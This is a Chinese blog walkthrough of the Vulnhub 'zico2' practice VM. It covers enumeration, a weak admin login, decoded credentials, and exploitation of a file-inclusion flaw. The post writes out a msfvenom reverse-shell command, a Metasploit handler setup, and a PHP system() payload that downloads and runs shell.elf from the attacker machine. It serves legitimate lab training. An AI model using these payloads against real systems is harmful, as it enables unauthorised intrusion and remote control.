Vulnhub靶机第九关

最新推荐文章于 2024-07-19 16:27:02 发布
最新推荐文章于 2024-07-19 16:27:02 发布
阅读量249 收藏 1
点赞数 1
分类专栏: Vulnhub靶机第九关 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/L1928/article/details/108348141
版权

Vulnhub靶机 zico2
运行环境
本靶机提供了OVA格式的镜像,官方推荐使用virtualbox,从Vulnhub下载之后,导入到viirtualbox即可运
行。
靶机:修改靶机的网络配置为桥接模式。
攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。
靶机说明
本靶机的难度为中等。
本靶机的渗透目标为渗透进靶机,拿到root权限,并读取flag文件。
官方提供了一个提示:枚举、枚举、枚举。
不局限与桥接模式,也可以修改为net模式
确定ip后执行
Nmap -A 192.168.238.138 扫描详细信息
在这里插入图片描述
访问这个ip
使用御剑扫描毛都没有,果断放弃
改用dirb
在这里插入图片描述
发现登录页面
在这里插入图片描述
在这里插入图片描述
尝试使用弱密码admin进行登录
登录成功后发现有两条数据
点击浏览进行查看
在这里插入图片描述
发现加密代码
在这里插入图片描述
尝试解密得到:34kroot34 zico zico2215@
在这里插入图片描述
先把账户密码放一边
新建hack.php数据库
在这里插入图片描述
在这里插入图片描述
内容输入<?php phpinfo();?>用于测试,利用文件包含漏洞来访问创建的hack.php
在这里插入图片描述
因为 此版本存在远程代码执行漏洞
所以利用msf生成一个反向壳的shell通过文件包含漏洞执行
生成shell
msfvenom -p linux/x64/meterpreter_reverse_tcp -f elf -o shell.elf -a x64 --platform linux LHOST=192.168.238.128 LPORT=4444
并将生产是shell.elf cp到tmp下
在这里插入图片描述
监听开启
在这里插入图片描述
然后利用python -m SimpleHTTPServer 80 搭建一个简易的web服务器
在这里插入图片描述
Msf输入 use exploit/multi/handler
set payload linux/x64/meterpreter_reverse_tcp
set LHOST 192.168.238.128
set LPORT 4444
Run
在这里插入图片描述
新建数据库
输入:<?php system("cd /tmp; wget http://192.168.238.128:80/shell.elf; chmod a+x shell.elf; ./shell.elf"); ?>
在这里插入图片描述
192.168.238.138/view.php?page=…/…/…/…/…/usr/databases/shell.php 访问
在这里插入图片描述
成功拿到shell
在这里插入图片描述
提权部分请参考十四关。

L无所不能
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub -- Nagini(难度--medium)
weixin_46107179的博客
05-07 561
靶机下载地址:下载链接 主机发现 还是同样的方法arp-scan -l来发现主机ip 信息搜集 得到靶机ip之后,通过nmap扫描进行信息搜集,得知开放22,80端口以及相版本服务 通过80端口,打开网站发现,该网站只有一张图片 通过查看源码也没有什么发现,接下来用gobuster进行路径扫描,发现了两个路径(/joomla和/note.txt) Joomla是一个CMS框架系统,再次对Joomla目录进行扫描,发现得到很多目录,但是基本上没有可用信息,只有一个后台登录页面看能不能进行突破 接着
VulnHub】Raven: 2靶机的渗透测试
大方子
06-28 4087
总结和思考: 使用netdiscover探测内网存活主机 PHPMailer的漏洞反弹得到shell Python版的EXP修改 查看wordpress的wp-config.php配置文件得到数据库账号密码 MySQL版本 <= 7.14 5.6.32 5.5.51 可以利用UDF提权 KALI对EXP的编译 给程序chmod u+s 增加suid权限,可以以root权限运...
VulnHub渗透测试实战靶场笔记(持续更新)
晚风不及你
03-05 7394
Breach1.0 下载链接 https://download.vulnhub.com/breach/Breach-1.0.zip 靶机说明 Breach1.0是一个难度为初级到中级的BooT2Root/CTF挑战。 VM虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网卡设置为host-only方式组网。非常感谢Knightmare和rastamouse进行测试和提供反馈。...
vulnhub靶场:SOCIAL NETWORK(难度等级:medium)
薄酒清欢的博客
09-03 587
SOCIAL NETWORK系列的靶场与常规靶场略有不同,拿到手的时候只有一个登录界面,他的ip地址、端口号、账号密码、服务类型、框架结构等信息全都需要我们手动探索。靶场难度中等难度,这也意味着仅靠一两种进攻手段是无法getshell的, 需要将多种攻击方式综合起来灵活运用。
Vulnhub Healthcare靶机教程
一个努力学习网安的小牛马
10-10 197
Vulnhub靶机 Healthcare 保姆级教程 过程内容详细
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
VulnHub 靶机系列实战教程.pdf
07-22
VulnHub 靶机系列实战教程.pdf
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Evil-WinRM一键测试主机安全情况(KALI工具系列四十四)
LNN0212的博客
07-17 842
Kali Linux 是一个功能强大、多才多艺的 Linux 发行版 ,广泛用于网络安全社区。它具有全面的预安装工具和功能集,使其成为安全测试、数字取证、事件响应和恶意软件分析的有效平台。作为使用者,你可以把它理解为一个特殊的Linux 发行版 ,集成了精心挑选的渗透测试和安全审计的工具,供渗透测试和安全设计人员使用,也可称之为平台或者框架。注意,一定只能用于自己设备的连通性测试哦!
内容安全(深度行为检测技术、IPS、AV、入侵检测方法)
Thewei666的博客
07-17 1096
区分不同的签名。
ForCloud全栈安全体验,一站式云安全托管试用 开启全能高效攻防
最新发布
亚信安全官方账号的博客
07-19 459
一站式云安全托管限时试用 开启全能高效攻防
Vue的安全性:防范XSS攻击与安全最佳实践
哎 你看的博客
07-19 593
随着Web应用的普及,前端安全问题日益受到重视。Vue作为当下流行的前端框架,其安全性也成为开发者注的焦点。跨站脚本攻击(XSS)是常见的Web安全漏洞之一,本文将讨论如何在使用Vue时防范XSS攻击,并分享其他Vue中的安全最佳实践。
防洪墙的安全内容检测+http请求头
代码其实很简单
07-17 673
--1、深度检测技术(DPI和DPF是所有内容检测都必须要用到的技术);DPI--深度包检测,针对完整的数据包,进行内容的识别和检测;---2、DFI ---深度流检测 ,---看名字都知道肯定是对数据流进行检测的技术;--2、IPS ---入侵防御--3、IDS---入侵检测,AV(反病毒) http请求头,http状态码
邮件安全篇:邮件端到端加密S/MIME
sdexcel的专栏
07-19 1022
本文主要介绍电子邮件端到端加密S/MIME的工作原理及客户端支持现状。
全文翻译 | OWASP《LLM安全与治理检查清单》
lurenjia404的博客
07-17 852
本文是OWASP(开放式网络应用安全项目)发布的《LLM AI安全与治理清单》(以下简称“清单”),旨在为使用大型语言模型(LLM)的组织提供安全与治理方面的指导。清单强调了负责任和可信的人工智能(AI)的重要性,并指出AI技术,尤其是LLM,在创新、效率和商业成功方面具有巨大潜力,同时也带来了明显的挑战。文中讨论了LLM面临的挑战,包括控制和数据平面的不可分割性、非确定性设计、语义搜索的使用等,并强调了LLM增加的攻击面和相风险。
HLS加密技术:保障流媒体内容安全的利器
jiamisoft的博客
07-17 991
HLS是一种由苹果公司提出的基于HTTP的流媒体网络传输协议,它允许将音视频文件编码为可播放的多媒体流,并通过HTTP协议进行传输。这种传输方式不仅具有广泛的网络适应性,还支持自适应比特率和分辨率,从而为用户提供流畅的观看体验。然而,HLS本身并不包含专门的加密方式,需要配合其他加密和防护措施来实现内容的安全传输。HLS加密技术的核心思想是将视频流分段,并对每个分段进行加密处理。在客户端播放时,需要先获取解密密钥才能正常播放。
数据库安全审计系统:筑牢数据安全防线 提高数据资产安全
2401_82472120的博客
07-17 491
其可以监控和审计用户对数据库中的数据库表、视图、序列、包、存储过程、函数、库、索引、同义词、快照、触发器等的访问、创建、修改和删除等,分析的内容可以精确到SQL操作语句级别。另外,它还可以根据设置的规则,智能判断出违规操作数据库的行为,并对违规行为进行记录、报警。通过对用户访问数据库行为的记录、分析和汇报,来帮助用户事后生成合规报告、事故追根溯源,同时通过大数据搜索技术提供高效查询审计报告,定位事件原因,以便日后查询、分析、过滤,实现加强内外部数据库网络行为的监控与审计,提高数据资产安全
vulnhub靶机系列:
09-09
你好!Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub上有许多靶机系列,每个系列都包含了多个不同难度级别的虚拟机。通过解决这些靶机,你可以学习到渗透测试中常见的攻击技术和漏洞利用方法。 一些著名的Vulnhub靶机系列包括: 1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞利用。 3. SickOS:这个系列提供了一些有趣的靶机,涵盖了各种不同类型的漏洞。 4. HackTheBox:虽然HackTheBox不是Vulnhub上的系列,但它也是一个非常受欢迎的漏洞测试平台,提供了一系列具有挑战性的靶机。 这些靶机系列都可以帮助你锻炼渗透测试技能,并提供了一个实践环境来深入了解网络安全和漏洞利用的原理。希望这些信息能帮到你!如果你还有其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值